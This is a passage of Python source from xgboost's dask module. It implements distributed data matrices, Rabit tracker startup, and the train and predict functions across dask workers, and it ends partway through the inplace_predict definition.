The implementation is heavily influenced by dask_xgboost:
https://github.com/dask/dask-xgboost
"""
import platform
import logging
from collections import defaultdict
from collections.abc import Sequence
from threading import Thread
from typing import TYPE_CHECKING, List, Tuple, Callable, Optional, Any, Union, Dict, Set
from typing import Awaitable, Generator, TypeVar
import numpy
from . import rabit, config
from .callback import TrainingCallback
from .compat import LazyLoader
from .compat import sparse, scipy_sparse
from .compat import PANDAS_INSTALLED, DataFrame, Series, pandas_concat
from .compat import lazy_isinstance
from .core import DMatrix, DeviceQuantileDMatrix, Booster, _expect, DataIter
from .core import Objective, Metric
from .core import _deprecate_positional_args
from .training import train as worker_train
from .tracker import RabitTracker, get_host_ip
from .sklearn import XGBModel, XGBRegressorBase, XGBClassifierBase, _objective_decorator
from .sklearn import xgboost_model_doc
from .sklearn import _cls_predict_proba
if TYPE_CHECKING:
from dask import dataframe as dd
from dask import array as da
import dask
import distributed
else:
dd = LazyLoader('dd', globals(), 'dask.dataframe')
da = LazyLoader('da', globals(), 'dask.array')
dask = LazyLoader('dask', globals(), 'dask')
distributed = LazyLoader('distributed', globals(), 'dask.distributed')
_DaskCollection = Union["da.Array", "dd.DataFrame", "dd.Series"]
try:
from mypy_extensions import TypedDict
TrainReturnT = TypedDict('TrainReturnT', {
'booster': Booster,
'history': Dict,
})
except ImportError:
TrainReturnT = Dict[str, Any] # type:ignore
# The current status is considered initial support; many features are not properly
# supported yet.
#
# TODOs:
# - CV
# - Ranking
#
# Note for developers:
#
# As of writing, asyncio is still a new feature of Python and in-depth documentation is
# rare. Best examples of various asyncio tricks are in dask (luckily). Classes like
# Client, Worker are awaitable. Some general rules for the implementation here:
#
# - Synchronous world is different from asynchronous one, and they don't mix well.
# - Write everything with async, then use distributed Client sync function to do the
# switch.
# - Use Any for type hint when the return value can be union of Awaitable and plain
#   value. This is caused by the fact that Client.sync can return both types
#   depending on context. Right now there's no good way to silence:
#
#     await train(...)
#
#   if train returns a Union type.
LOGGER = logging.getLogger('[xgboost.dask]')
def _start_tracker(n_workers: int) -> Dict[str, Any]:
"""Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
host = get_host_ip('auto')
rabit_context = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit_context.slave_envs())
rabit_context.start(n_workers)
thread = Thread(target=rabit_context.join)
thread.daemon = True
thread.start()
return env
def _assert_dask_support() -> None:
try:
import dask # pylint: disable=W0621,W0611
except ImportError as e:
raise ImportError(
'Dask needs to be installed in order to use this module') from e
if platform.system() == 'Windows':
msg = 'Windows is not officially supported for dask/xgboost,'
        msg += ' contributions are welcome.'
LOGGER.warning(msg)
class RabitContext:
    '''A context controlling rabit initialization and finalization.'''
def __init__(self, args: List[bytes]) -> None:
self.args = args
worker = distributed.get_worker()
self.args.append(
('DMLC_TASK_ID=[xgboost.dask]:' + str(worker.address)).encode())
def __enter__(self) -> None:
rabit.init(self.args)
LOGGER.debug('-------------- rabit say hello ------------------')
def __exit__(self, *args: List) -> None:
rabit.finalize()
LOGGER.debug('--------------- rabit say bye ------------------')
def concat(value: Any) -> Any: # pylint: disable=too-many-return-statements
'''To be replaced with dask builtin.'''
if isinstance(value[0], numpy.ndarray):
return numpy.concatenate(value, axis=0)
if scipy_sparse and isinstance(value[0], scipy_sparse.spmatrix):
return scipy_sparse.vstack(value, format='csr')
if sparse and isinstance(value[0], sparse.SparseArray):
return sparse.concatenate(value, axis=0)
if PANDAS_INSTALLED and isinstance(value[0], (DataFrame, Series)):
return pandas_concat(value, axis=0)
if lazy_isinstance(value[0], 'cudf.core.dataframe', 'DataFrame') or \
lazy_isinstance(value[0], 'cudf.core.series', 'Series'):
from cudf import concat as CUDF_concat # pylint: disable=import-error
return CUDF_concat(value, axis=0)
if lazy_isinstance(value[0], 'cupy.core.core', 'ndarray'):
import cupy
# pylint: disable=c-extension-no-member,no-member
d = cupy.cuda.runtime.getDevice()
for v in value:
d_v = v.device.id
assert d_v == d, 'Concatenating arrays on different devices.'
return cupy.concatenate(value, axis=0)
return dd.multi.concat(list(value), axis=0)
def _xgb_get_client(client: Optional["distributed.Client"]) -> "distributed.Client":
'''Simple wrapper around testing None.'''
if not isinstance(client, (type(distributed.get_client()), type(None))):
raise TypeError(
_expect([type(distributed.get_client()), type(None)], type(client)))
ret = distributed.get_client() if client is None else client
return ret
# From the implementation point of view, DaskDMatrix complicates a lot of
# things. A large portion of the code base is about syncing and extracting
# stuff from DaskDMatrix. But having an independent data structure gives us a
# chance to perform some specialized optimizations, like building histogram
# index directly.
class DaskDMatrix:
# pylint: disable=missing-docstring, too-many-instance-attributes
    '''DMatrix holding references to a Dask DataFrame or Dask Array. Constructing
    a `DaskDMatrix` forces all lazy computation to be carried out. Wait for
    the input data explicitly if you want to see the actual computation of
    constructing the `DaskDMatrix`.
.. note::
DaskDMatrix does not repartition or move data between workers. It's
the caller's responsibility to balance the data.
.. versionadded:: 1.0.0
Parameters
----------
client :
Specify the dask client used for training. Use default client returned from dask
if it's set to None.
data :
data source of DMatrix.
label :
        Label used for training.
missing :
        Value in the input data (e.g. `numpy.ndarray`) which should be treated
        as missing. If None, defaults to np.nan.
weight :
Weight for each instance.
base_margin :
Global bias for each instance.
    label_lower_bound :
        Lower bound for survival training.
    label_upper_bound :
        Upper bound for survival training.
feature_weights :
Weight for features used in column sampling.
feature_names :
Set names for features.
feature_types :
Set types for features
'''
def __init__(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
missing: float = None,
weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None
) -> None:
_assert_dask_support()
client = _xgb_get_client(client)
self.feature_names = feature_names
self.feature_types = feature_types
self.missing = missing
if len(data.shape) != 2:
raise ValueError(
'Expecting 2 dimensional input, got: {shape}'.format(
shape=data.shape))
if not isinstance(data, (dd.DataFrame, da.Array)):
raise TypeError(_expect((dd.DataFrame, da.Array), type(data)))
if not isinstance(label, (dd.DataFrame, da.Array, dd.Series,
type(None))):
raise TypeError(
_expect((dd.DataFrame, da.Array, dd.Series), type(label)))
self.worker_map: Dict[str, "distributed.Future"] = defaultdict(list)
self.is_quantile: bool = False
self._init = client.sync(self.map_local_data,
client, data, label=label, weights=weight,
base_margin=base_margin,
feature_weights=feature_weights,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound)
def __await__(self) -> Generator:
return self._init.__await__()
async def map_local_data(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
weights: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None
) -> "DaskDMatrix":
'''Obtain references to local data.'''
def inconsistent(
left: List[Any], left_name: str, right: List[Any], right_name: str
) -> str:
msg = 'Partitions between {a_name} and {b_name} are not ' \
'consistent: {a_len} != {b_len}. ' \
'Please try to repartition/rechunk your data.'.format(
a_name=left_name, b_name=right_name, a_len=len(left),
b_len=len(right)
)
return msg
def check_columns(parts: Any) -> None:
# x is required to be 2 dim in __init__
assert parts.ndim == 1 or parts.shape[1], 'Data should be' \
' partitioned by row. To avoid this specify the number' \
' of columns for your dask Array explicitly. e.g.' \
' chunks=(partition_size, X.shape[1])'
data = data.persist()
for meta in [label, weights, base_margin, label_lower_bound,
label_upper_bound]:
if meta is not None:
meta = meta.persist()
# Breaking data into partitions, a trick borrowed from dask_xgboost.
# `to_delayed` downgrades high-level objects into numpy or pandas
# equivalents.
X_parts = data.to_delayed()
if isinstance(X_parts, numpy.ndarray):
check_columns(X_parts)
X_parts = X_parts.flatten().tolist()
def flatten_meta(
meta: Optional[_DaskCollection]
) -> "Optional[List[dask.delayed.Delayed]]":
if meta is not None:
meta_parts = meta.to_delayed()
if isinstance(meta_parts, numpy.ndarray):
check_columns(meta_parts)
meta_parts = meta_parts.flatten().tolist()
return meta_parts
return None
y_parts = flatten_meta(label)
w_parts = flatten_meta(weights)
margin_parts = flatten_meta(base_margin)
ll_parts = flatten_meta(label_lower_bound)
lu_parts = flatten_meta(label_upper_bound)
parts = [X_parts]
meta_names = []
def append_meta(
m_parts: Optional[List["dask.delayed.delayed"]], name: str
) -> None:
if m_parts is not None:
assert len(X_parts) == len(
m_parts), inconsistent(X_parts, 'X', m_parts, name)
parts.append(m_parts)
meta_names.append(name)
append_meta(y_parts, 'labels')
append_meta(w_parts, 'weights')
append_meta(margin_parts, 'base_margin')
append_meta(ll_parts, 'label_lower_bound')
append_meta(lu_parts, 'label_upper_bound')
# At this point, `parts` looks like:
# [(x0, x1, ..), (y0, y1, ..), ..] in delayed form
# delay the zipped result
parts = list(map(dask.delayed, zip(*parts))) # pylint: disable=no-member
# At this point, the mental model should look like:
# [(x0, y0, ..), (x1, y1, ..), ..] in delayed form
parts = client.compute(parts)
await distributed.wait(parts) # async wait for parts to be computed
for part in parts:
assert part.status == 'finished', part.status
# Preserving the partition order for prediction.
self.partition_order = {}
for i, part in enumerate(parts):
self.partition_order[part.key] = i
key_to_partition = {part.key: part for part in parts}
who_has = await client.scheduler.who_has(keys=[part.key for part in parts])
worker_map: Dict[str, "distributed.Future"] = defaultdict(list)
for key, workers in who_has.items():
worker_map[next(iter(workers))].append(key_to_partition[key])
self.worker_map = worker_map
self.meta_names = meta_names
if feature_weights is None:
self.feature_weights = None
else:
self.feature_weights = await client.compute(feature_weights).result()
return self
def create_fn_args(self, worker_addr: str) -> Dict[str, Any]:
'''Create a dictionary of objects that can be pickled for function
arguments.
'''
return {'feature_names': self.feature_names,
'feature_types': self.feature_types,
'feature_weights': self.feature_weights,
'meta_names': self.meta_names,
'missing': self.missing,
'parts': self.worker_map.get(worker_addr, None),
'is_quantile': self.is_quantile}
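# A minimal usage sketch (never called) for DaskDMatrix. The input must be
# 2-dimensional, and no repartitioning is performed, so the data should already
# be balanced across the dask workers.
def _daskdmatrix_usage_sketch() -> "DaskDMatrix":
    client = distributed.Client()                       # connect to / start a dask cluster
    X = da.random.random((1000, 10), chunks=(100, 10))  # 2-dim dask array
    y = da.random.random(1000, chunks=100)
    return DaskDMatrix(client, X, y)                    # triggers the lazy computation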
_DataParts = List[Tuple[Any, Optional[Any], Optional[Any], Optional[Any], Optional[Any],
Optional[Any]]]
def _get_worker_parts_ordered(
meta_names: List[str], list_of_parts: _DataParts
) -> _DataParts:
# List of partitions like: [(x3, y3, w3, m3, ..), ..], order is not preserved.
assert isinstance(list_of_parts, list)
result = []
for i, _ in enumerate(list_of_parts):
data = list_of_parts[i][0]
labels = None
weights = None
base_margin = None
label_lower_bound = None
label_upper_bound = None
        # Iterate through all possible meta info; this brings only a small
        # overhead, as xgboost has a constant number of meta info fields.
for j, blob in enumerate(list_of_parts[i][1:]):
if meta_names[j] == 'labels':
labels = blob
elif meta_names[j] == 'weights':
weights = blob
elif meta_names[j] == 'base_margin':
base_margin = blob
elif meta_names[j] == 'label_lower_bound':
label_lower_bound = blob
elif meta_names[j] == 'label_upper_bound':
label_upper_bound = blob
else:
raise ValueError('Unknown metainfo:', meta_names[j])
result.append((data, labels, weights, base_margin, label_lower_bound,
label_upper_bound))
return result
def _unzip(list_of_parts: _DataParts) -> List[Tuple[Any, ...]]:
return list(zip(*list_of_parts))
def _get_worker_parts(
list_of_parts: _DataParts, meta_names: List[str]
) -> List[Tuple[Any, ...]]:
partitions = _get_worker_parts_ordered(meta_names, list_of_parts)
partitions_unzipped = _unzip(partitions)
return partitions_unzipped
class DaskPartitionIter(DataIter): # pylint: disable=R0902
"""A data iterator for `DaskDeviceQuantileDMatrix`."""
def __init__(
self,
data: Tuple[Any, ...],
label: Optional[Tuple[Any, ...]] = None,
weight: Optional[Tuple[Any, ...]] = None,
base_margin: Optional[Tuple[Any, ...]] = None,
label_lower_bound: Optional[Tuple[Any, ...]] = None,
label_upper_bound: Optional[Tuple[Any, ...]] = None,
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None
) -> None:
self._data = data
self._labels = label
self._weights = weight
self._base_margin = base_margin
self._label_lower_bound = label_lower_bound
self._label_upper_bound = label_upper_bound
self._feature_names = feature_names
self._feature_types = feature_types
assert isinstance(self._data, Sequence)
types = (Sequence, type(None))
assert isinstance(self._labels, types)
assert isinstance(self._weights, types)
assert isinstance(self._base_margin, types)
assert isinstance(self._label_lower_bound, types)
assert isinstance(self._label_upper_bound, types)
self._iter = 0 # set iterator to 0
super().__init__()
def data(self) -> Any:
'''Utility function for obtaining current batch of data.'''
return self._data[self._iter]
def labels(self) -> Any:
'''Utility function for obtaining current batch of label.'''
if self._labels is not None:
return self._labels[self._iter]
return None
def weights(self) -> Any:
        '''Utility function for obtaining current batch of weight.'''
if self._weights is not None:
return self._weights[self._iter]
return None
def base_margins(self) -> Any:
'''Utility function for obtaining current batch of base_margin.'''
if self._base_margin is not None:
return self._base_margin[self._iter]
return None
def label_lower_bounds(self) -> Any:
'''Utility function for obtaining current batch of label_lower_bound.
'''
if self._label_lower_bound is not None:
return self._label_lower_bound[self._iter]
return None
def label_upper_bounds(self) -> Any:
'''Utility function for obtaining current batch of label_upper_bound.
'''
if self._label_upper_bound is not None:
return self._label_upper_bound[self._iter]
return None
def reset(self) -> None:
'''Reset the iterator'''
self._iter = 0
def next(self, input_data: Callable) -> int:
'''Yield next batch of data'''
if self._iter == len(self._data):
# Return 0 when there's no more batch.
return 0
feature_names: Optional[Union[List[str], str]] = None
if self._feature_names:
feature_names = self._feature_names
else:
if hasattr(self.data(), 'columns'):
feature_names = self.data().columns.format()
else:
feature_names = None
input_data(data=self.data(), label=self.labels(),
weight=self.weights(), group=None,
label_lower_bound=self.label_lower_bounds(),
label_upper_bound=self.label_upper_bounds(),
feature_names=feature_names,
feature_types=self._feature_types)
self._iter += 1
return 1
class DaskDeviceQuantileDMatrix(DaskDMatrix):
    '''Specialized data type for the `gpu_hist` tree method. This class is used
    to reduce memory usage by eliminating data copies. Internally, all the
    partitions/chunks of data are merged by weighted GK sketching, so the
    number of partitions from dask may affect training accuracy, as GK
    sketching generates a bounded error for each merge.
.. versionadded:: 1.2.0
Parameters
----------
max_bin : Number of bins for histogram construction.
'''
def __init__(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
missing: float = None,
weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None,
max_bin: int = 256
) -> None:
super().__init__(client=client, data=data, label=label,
missing=missing,
weight=weight, base_margin=base_margin,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound,
feature_names=feature_names,
feature_types=feature_types)
self.max_bin = max_bin
self.is_quantile = True
def create_fn_args(self, worker_addr: str) -> Dict[str, Any]:
args = super().create_fn_args(worker_addr)
args['max_bin'] = self.max_bin
return args
def _create_device_quantile_dmatrix(
feature_names: Optional[Union[str, List[str]]],
feature_types: Optional[Union[Any, List[Any]]],
feature_weights: Optional[Any],
meta_names: List[str],
missing: float,
parts: Optional[_DataParts],
max_bin: int
) -> DeviceQuantileDMatrix:
worker = distributed.get_worker()
if parts is None:
msg = 'worker {address} has an empty DMatrix. '.format(
address=worker.address)
LOGGER.warning(msg)
import cupy
d = DeviceQuantileDMatrix(cupy.zeros((0, 0)),
feature_names=feature_names,
feature_types=feature_types,
max_bin=max_bin)
return d
(data, labels, weights, base_margin,
label_lower_bound, label_upper_bound) = _get_worker_parts(
parts, meta_names)
it = DaskPartitionIter(data=data, label=labels, weight=weights,
base_margin=base_margin,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound)
dmatrix = DeviceQuantileDMatrix(it,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads,
max_bin=max_bin)
dmatrix.set_info(feature_weights=feature_weights)
return dmatrix
def _create_dmatrix(
feature_names: Optional[Union[str, List[str]]],
feature_types: Optional[Union[Any, List[Any]]],
feature_weights: Optional[Any],
meta_names: List[str],
missing: float,
parts: Optional[_DataParts]
) -> DMatrix:
    '''Get the data local to this worker from a DaskDMatrix.
Returns
-------
A DMatrix object.
'''
worker = distributed.get_worker()
list_of_parts = parts
if list_of_parts is None:
msg = 'worker {address} has an empty DMatrix. '.format(address=worker.address)
LOGGER.warning(msg)
d = DMatrix(numpy.empty((0, 0)),
feature_names=feature_names,
feature_types=feature_types)
return d
T = TypeVar('T')
def concat_or_none(data: Tuple[Optional[T], ...]) -> Optional[T]:
if any([part is None for part in data]):
return None
return concat(data)
(data, labels, weights, base_margin,
label_lower_bound, label_upper_bound) = _get_worker_parts(list_of_parts, meta_names)
_labels = concat_or_none(labels)
_weights = concat_or_none(weights)
_base_margin = concat_or_none(base_margin)
_label_lower_bound = concat_or_none(label_lower_bound)
_label_upper_bound = concat_or_none(label_upper_bound)
_data = concat(data)
dmatrix = DMatrix(_data,
_labels,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads)
dmatrix.set_info(base_margin=_base_margin, weight=_weights,
label_lower_bound=_label_lower_bound,
label_upper_bound=_label_upper_bound,
feature_weights=feature_weights)
return dmatrix
def _dmatrix_from_list_of_parts(
is_quantile: bool, **kwargs: Any
) -> Union[DMatrix, DeviceQuantileDMatrix]:
if is_quantile:
return _create_device_quantile_dmatrix(**kwargs)
return _create_dmatrix(**kwargs)
async def _get_rabit_args(n_workers: int, client: "distributed.Client") -> List[bytes]:
'''Get rabit context arguments from data distribution in DaskDMatrix.'''
env = await client.run_on_scheduler(_start_tracker, n_workers)
rabit_args = [('%s=%s' % item).encode() for item in env.items()]
return rabit_args
# train and predict methods are supposed to be "functional", which meets the
# dask paradigm. But as a side effect, the `evals_result` in single-node API
# is no longer supported since it mutates the input parameter, and it's not
# intuitive to sync the mutation result. Therefore, a dictionary containing
# evaluation history is instead returned.
def _get_workers_from_data(
dtrain: DaskDMatrix,
evals: Optional[List[Tuple[DaskDMatrix, str]]]
) -> Set[str]:
X_worker_map: Set[str] = set(dtrain.worker_map.keys())
if evals:
for e in evals:
assert len(e) == 2
assert isinstance(e[0], DaskDMatrix) and isinstance(e[1], str)
worker_map = set(e[0].worker_map.keys())
X_worker_map = X_worker_map.union(worker_map)
return X_worker_map
async def _train_async(
client: "distributed.Client",
global_config: Dict[str, Any],
params: Dict[str, Any],
dtrain: DaskDMatrix,
num_boost_round: int,
evals: Optional[List[Tuple[DaskDMatrix, str]]],
obj: Optional[Objective],
feval: Optional[Metric],
early_stopping_rounds: Optional[int],
verbose_eval: Union[int, bool],
xgb_model: Optional[Booster],
callbacks: Optional[List[TrainingCallback]]
) -> Optional[TrainReturnT]:
workers = list(_get_workers_from_data(dtrain, evals))
_rabit_args = await _get_rabit_args(len(workers), client)
def dispatched_train(
worker_addr: str,
rabit_args: List[bytes],
dtrain_ref: Dict,
dtrain_idt: int,
evals_ref: Dict
) -> Optional[Dict[str, Union[Booster, Dict]]]:
'''Perform training on a single worker. A local function prevents pickling.
'''
LOGGER.info('Training on %s', str(worker_addr))
worker = distributed.get_worker()
with RabitContext(rabit_args), config.config_context(**global_config):
local_dtrain = _dmatrix_from_list_of_parts(**dtrain_ref)
local_evals = []
if evals_ref:
for ref, name, idt in evals_ref:
if idt == dtrain_idt:
local_evals.append((local_dtrain, name))
continue
local_evals.append((_dmatrix_from_list_of_parts(**ref), name))
local_history: Dict = {}
local_param = params.copy() # just to be consistent
msg = 'Overriding `nthreads` defined in dask worker.'
override = ['nthread', 'n_jobs']
for p in override:
val = local_param.get(p, None)
if val is not None and val != worker.nthreads:
LOGGER.info(msg)
else:
local_param[p] = worker.nthreads
bst = worker_train(params=local_param,
dtrain=local_dtrain,
num_boost_round=num_boost_round,
evals_result=local_history,
evals=local_evals,
obj=obj,
feval=feval,
early_stopping_rounds=early_stopping_rounds,
verbose_eval=verbose_eval,
xgb_model=xgb_model,
callbacks=callbacks)
ret: Optional[Dict[str, Union[Booster, Dict]]] = {
'booster': bst, 'history': local_history}
if local_dtrain.num_row() == 0:
ret = None
return ret
    # Note on function purity:
    # XGBoost is deterministic in most cases, which means the train function is
    # supposed to be idempotent. One known exception is gblinear with the
    # shotgun updater. We haven't been able to do a full verification, so here
    # we keep `pure` set to False.
futures = []
for i, worker_addr in enumerate(workers):
if evals:
evals_per_worker = [(e.create_fn_args(worker_addr), name, id(e))
for e, name in evals]
else:
evals_per_worker = []
f = client.submit(dispatched_train,
worker_addr,
_rabit_args,
dtrain.create_fn_args(workers[i]),
id(dtrain),
evals_per_worker,
pure=False,
workers=[worker_addr])
futures.append(f)
results = await client.gather(futures)
return list(filter(lambda ret: ret is not None, results))[0]
def train(
client: "distributed.Client",
params: Dict[str, Any],
dtrain: DaskDMatrix,
num_boost_round: int = 10,
evals: Optional[List[Tuple[DaskDMatrix, str]]] = None,
obj: Optional[Objective] = None,
feval: Optional[Metric] = None,
early_stopping_rounds: Optional[int] = None,
xgb_model: Optional[Booster] = None,
verbose_eval: Union[int, bool] = True,
callbacks: Optional[List[TrainingCallback]] = None
) -> Any:
'''Train XGBoost model.
.. versionadded:: 1.0.0
.. note::
        Other parameters are the same as `xgboost.train` except for `evals_result`,
        which is returned as part of the function's return value instead of being
        passed as an argument.
Parameters
----------
client :
Specify the dask client used for training. Use default client returned from dask
if it's set to None.
Returns
-------
results: dict
A dictionary containing trained booster and evaluation history. `history` field
is the same as `eval_result` from `xgboost.train`.
.. code-block:: python
{'booster': xgboost.Booster,
'history': {'train': {'logloss': ['0.48253', '0.35953']},
'eval': {'logloss': ['0.480385', '0.357756']}}}
'''
_assert_dask_support()
client = _xgb_get_client(client)
# Get global configuration before transferring computation to another thread or
# process.
global_config = config.get_config()
return client.sync(_train_async,
client=client,
global_config=global_config,
num_boost_round=num_boost_round,
obj=obj,
feval=feval,
params=params,
dtrain=dtrain,
evals=evals,
early_stopping_rounds=early_stopping_rounds,
verbose_eval=verbose_eval,
xgb_model=xgb_model,
callbacks=callbacks)
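# A minimal usage sketch (never called) for the functional API: train returns a
# dict holding the trained booster and the evaluation history.
def _train_usage_sketch(client: "distributed.Client") -> TrainReturnT:
    X = da.random.random((1000, 10), chunks=(100, 10))
    y = da.random.random(1000, chunks=100)
    dtrain = DaskDMatrix(client, X, y)
    output = train(client, {'tree_method': 'hist'}, dtrain, num_boost_round=10)
    # output['booster'] is an xgboost.Booster, output['history'] the eval history
    return output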
async def _direct_predict_impl(
client: "distributed.Client",
data: _DaskCollection,
predict_fn: Callable
) -> _DaskCollection:
if isinstance(data, da.Array):
predictions = await client.submit(
da.map_blocks,
predict_fn, data, False, drop_axis=1,
dtype=numpy.float32
).result()
return predictions
if isinstance(data, dd.DataFrame):
predictions = await client.submit(
dd.map_partitions,
predict_fn, data, True,
meta=dd.utils.make_meta({'prediction': 'f4'})
).result()
return predictions.iloc[:, 0]
raise TypeError('data of type: ' + str(type(data)) +
' is not supported by direct prediction')
# pylint: disable=too-many-statements
async def _predict_async(
client: "distributed.Client",
global_config: Dict[str, Any],
model: Union[Booster, Dict],
data: _DaskCollection,
output_margin: bool,
missing: float,
pred_leaf: bool,
pred_contribs: bool,
approx_contribs: bool,
pred_interactions: bool,
validate_features: bool
) -> _DaskCollection:
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, (DaskDMatrix, da.Array, dd.DataFrame)):
raise TypeError(_expect([DaskDMatrix, da.Array, dd.DataFrame],
type(data)))
def mapped_predict(partition: Any, is_df: bool) -> Any:
worker = distributed.get_worker()
with config.config_context(**global_config):
booster.set_param({'nthread': worker.nthreads})
m = DMatrix(partition, missing=missing, nthread=worker.nthreads)
predt = booster.predict(
data=m,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
validate_features=validate_features
)
if is_df:
if lazy_isinstance(partition, 'cudf', 'core.dataframe.DataFrame'):
import cudf
predt = cudf.DataFrame(predt, columns=['prediction'])
else:
predt = DataFrame(predt, columns=['prediction'])
return predt
# Predict on dask collection directly.
if isinstance(data, (da.Array, dd.DataFrame)):
return await _direct_predict_impl(client, data, mapped_predict)
# Prediction on dask DMatrix.
worker_map = data.worker_map
partition_order = data.partition_order
feature_names = data.feature_names
feature_types = data.feature_types
missing = data.missing
meta_names = data.meta_names
def dispatched_predict(
worker_id: int, list_of_orders: List[int], list_of_parts: _DataParts
) -> List[Tuple[Tuple["dask.delayed.Delayed", int], int]]:
'''Perform prediction on each worker.'''
LOGGER.info('Predicting on %d', worker_id)
with config.config_context(**global_config):
worker = distributed.get_worker()
list_of_parts = _get_worker_parts_ordered(meta_names, list_of_parts)
predictions = []
booster.set_param({'nthread': worker.nthreads})
for i, parts in enumerate(list_of_parts):
(data, _, _, base_margin, _, _) = parts
order = list_of_orders[i]
local_part = DMatrix(
data,
base_margin=base_margin,
feature_names=feature_names,
feature_types=feature_types,
missing=missing,
nthread=worker.nthreads
)
predt = booster.predict(
data=local_part,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
validate_features=validate_features
)
columns = 1 if len(predt.shape) == 1 else predt.shape[1]
ret = ((dask.delayed(predt), columns), order) # pylint: disable=no-member
predictions.append(ret)
return predictions
def dispatched_get_shape(
worker_id: int, list_of_orders: List[int], list_of_parts: _DataParts
) -> List[Tuple[int, int]]:
'''Get shape of data in each worker.'''
LOGGER.info('Get shape on %d', worker_id)
list_of_parts = _get_worker_parts_ordered(meta_names, list_of_parts)
shapes = []
for i, parts in enumerate(list_of_parts):
(data, _, _, _, _, _) = parts
shapes.append((data.shape, list_of_orders[i]))
return shapes
async def map_function(
func: Callable[[int, List[int], _DataParts], Any]
) -> List[Any]:
'''Run function for each part of the data.'''
futures = []
workers_address = list(worker_map.keys())
for wid, worker_addr in enumerate(workers_address):
worker_addr = workers_address[wid]
list_of_parts = worker_map[worker_addr]
list_of_orders = [partition_order[part.key] for part in list_of_parts]
f = client.submit(func, worker_id=wid,
list_of_orders=list_of_orders,
list_of_parts=list_of_parts,
pure=True, workers=[worker_addr])
assert isinstance(f, distributed.client.Future)
futures.append(f)
# Get delayed objects
results = await client.gather(futures)
# flatten into 1 dim list
results = [t for list_per_worker in results for t in list_per_worker]
# sort by order, l[0] is the delayed object, l[1] is its order
results = sorted(results, key=lambda l: l[1])
results = [predt for predt, order in results] # remove order
return results
results = await map_function(dispatched_predict)
shapes = await map_function(dispatched_get_shape)
# Constructing a dask array from list of numpy arrays
# See https://docs.dask.org/en/latest/array-creation.html
arrays = []
for i, shape in enumerate(shapes):
arrays.append(da.from_delayed(
results[i][0], shape=(shape[0],)
if results[i][1] == 1 else (shape[0], results[i][1]),
dtype=numpy.float32))
predictions = await da.concatenate(arrays, axis=0)
return predictions
def predict(
client: "distributed.Client",
model: Union[TrainReturnT, Booster],
data: Union[DaskDMatrix, _DaskCollection],
output_margin: bool = False,
missing: float = numpy.nan,
pred_leaf: bool = False,
pred_contribs: bool = False,
approx_contribs: bool = False,
pred_interactions: bool = False,
validate_features: bool = True
) -> Any:
'''Run prediction with a trained booster.
.. note::
Only default prediction mode is supported right now.
.. versionadded:: 1.0.0
Parameters
----------
client:
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model:
The trained model.
data:
Input data used for prediction. When input is a dataframe object,
prediction output is a series.
missing:
Used when input data is not DaskDMatrix. Specify the value
considered as missing.
Returns
-------
prediction: dask.array.Array/dask.dataframe.Series
'''
_assert_dask_support()
client = _xgb_get_client(client)
global_config = config.get_config()
return client.sync(
_predict_async, client, global_config, model, data,
output_margin=output_margin,
missing=missing,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
validate_features=validate_features
)
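# A minimal usage sketch (never called): predicting directly on a dask
# collection returns a lazy dask array (or a dask series for dataframe input).
def _predict_usage_sketch(client: "distributed.Client", output: TrainReturnT) -> Any:
    X_new = da.random.random((100, 10), chunks=(50, 10))
    prediction = predict(client, output, X_new)
    return prediction.compute()  # materialise the predictions as a numpy array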
async def _inplace_predict_async(
client: "distributed.Client",
global_config: Dict[str, Any],
model: Union[Booster, Dict],
data: _DaskCollection,
iteration_range: Tuple[int, int] = (0, 0),
predict_type: str = 'value',
missing: float = numpy.nan
) -> _DaskCollection:
client = _xgb_get_client(client)
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, (da.Array, dd.DataFrame)):
raise TypeError(_expect([da.Array, dd.DataFrame], type(data)))
def mapped_predict(data: Any, is_df: bool) -> Any:
worker = distributed.get_worker()
config.set_config(**global_config)
booster.set_param({'nthread': worker.nthreads})
prediction = booster.inplace_predict(
data,
iteration_range=iteration_range,
predict_type=predict_type,
missing=missing)
if is_df:
if lazy_isinstance(data, 'cudf.core.dataframe', 'DataFrame'):
import cudf
prediction = cudf.DataFrame({'prediction': prediction},
dtype=numpy.float32)
else:
# If it's from pandas, the partition is a numpy array
prediction = DataFrame(prediction, columns=['prediction'],
dtype=numpy.float32)
return prediction
return await _direct_predict_impl(client, data, mapped_predict)
def inplace_predict(
client: "distributed.Client",
